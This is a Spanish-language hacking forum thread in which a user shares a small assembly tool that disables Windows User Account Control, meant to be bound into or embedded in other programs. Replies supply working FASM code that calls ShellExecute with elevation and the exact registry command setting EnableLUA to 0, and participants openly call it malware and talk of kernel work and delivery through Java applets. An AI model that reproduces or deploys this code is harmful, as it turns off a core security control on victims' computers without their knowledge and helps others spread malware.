Después de dos días estudiando ASM, pude hacer esto, 4 Bitch horas programando, por que no conseguía hacer funcionar ''ShellExecute'', y vi estas API's en el Modulo Fuck UAC que publiqué hace tiempo.

Pesa solo 2kb, mayormente es para Bindearlo o añadirlo de Resource a sus proyectos.

Scan:

Mostrar/Ocultar

Source:

Mostrar/Ocultar

Descarga:[Enlace externo eliminado para invitados]

Password: Hackerize > Reverse > RC4(Scorpio) > DES(Xor(Scorpio)) > BASE64 > TIGO > FAERON74 > ESAB46 > ZONG22 > ZARA128 > TRAN15 > LEPAD18 > JAPOO C2

Mostrar/Ocultar

Saludos.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
La puta madre, ya te iba a preguntar cuanto tardaste en cifrar la pass JAJAJAJ.

Buen trabajo, dale duro a ASM!
Soy un camaleón, en tu cama, leona ♪
Dale muy bueno cerda , sigue dandole al bajo nivel
PD: que te muevan el post a su sección :p
$DoC escribió:La puta madre, ya te iba a preguntar cuanto tardaste en cifrar la pass JAJAJAJ.

Buen trabajo, dale duro a ASM!
Jajaja
Aprendo ASM solo por aburrimiento, así entiendo mas de API's y me valdrá para ASM Inline ahora en C++.

Saludos.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
sanko escribió:Dale muy bueno cerda , sigue dandole al bajo nivel
PD: que te muevan el post a su sección :p

Bueno tú con Python, no te resbales por las escaleras nunca.

PD:Fuck UAC = Malware

Saludos.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Muy buen código, ¿que ASM usas?
No te limites solo a el modo usuario hay un mundo de posibilidades en el kernel ;)

Saludos!
We do what we must, because, we can-> [www.youtube.com/watch?v=Y6ljFaKRTrI]
Pasa a saludar: NeoDark-Labs.BlogSpot.mx
<<<<Proyectos en curso>>>>
[+]Restauración de SSDT
[+]Driver v3 - Ocultar drivers
[+]Anti-rootkit
Bueno el code aunque, mejor que el exe ejecute un *.reg y no lleva firma XD

Métete al modo KERNEL Con orlando :3
orlando9427 escribió:Muy buen código, ¿que ASM usas?
No te limites solo a el modo usuario hay un mundo de posibilidades en el kernel ;)

Saludos!
Jaja, yo no podría con eso, aquí el maestro eres tú.
Uso FASM, fue el que mas me gusto, hace tiempo tenia MASM pero no me termino de convencer.
adwind escribió:Bueno el code aunque, mejor que el exe ejecute un *.reg y no lleva firma XD

Métete al modo KERNEL Con orlando :3
Ya ví lo de los .reg en tus Applet Java, aunque yo prefiero hacerlo desde Shell como ya dije, que es todo código y se puede ofuscar fácilmente, solo que me he peleado con ''ShellExecute''.

Saludos.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Por si quieres con la ShellExcecute creo que quieres algo así.




include 'WIN32AX.INC'
 
.data
  archivo db "C:\file.exe",0
  runas db "runas",0
.code
start:
PUSH SW_SHOW
PUSH NULL
PUSH NULL
PUSH archivo
PUSH runas
PUSH NULL
CALL [ShellExecute]
PUSH 0
CALL [ExitProcess]

.end start





Saludos



PD: no lo probé porque no tengo el fasm a la mano. pero debería andar.

saludos
Imagen
Pink escribió:Por si quieres con la ShellExcecute creo que quieres algo así.
include 'WIN32AX.INC'
 
.data
  archivo db "C:\file.exe",0
  runas db "runas",0
.code
start:
PUSH SW_SHOW
PUSH NULL
PUSH NULL
PUSH archivo
PUSH runas
PUSH NULL
CALL [ShellExecute]
PUSH 0
CALL [ExitProcess]

.end start
Saludos

PD: no lo probé porque no tengo el fasm a la mano. pero debería andar.

saludos
Ya lo intente asi, pero nada, no tira, quiero ejecutar esta línea.

Código: Seleccionar todo

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Al ponerlo en tu código tampoco funciona, y yo no veo que hago mal, aun no tengo el nivel.

Muchas Gracias

Saludos.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Proba así a ver. :P
include 'WIN32AX.INC'
 
.data
  cmd db "cmd.exe",0
  parametro db "/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
.code
start:
PUSH SW_SHOW
PUSH NULL
PUSH parametro
PUSH cmd
PUSH NULL
PUSH NULL
CALL [ShellExecute]
PUSH 0
CALL [ExitProcess]

.end start


Saludos
Imagen
Responder

Volver a “Nuestros Programas”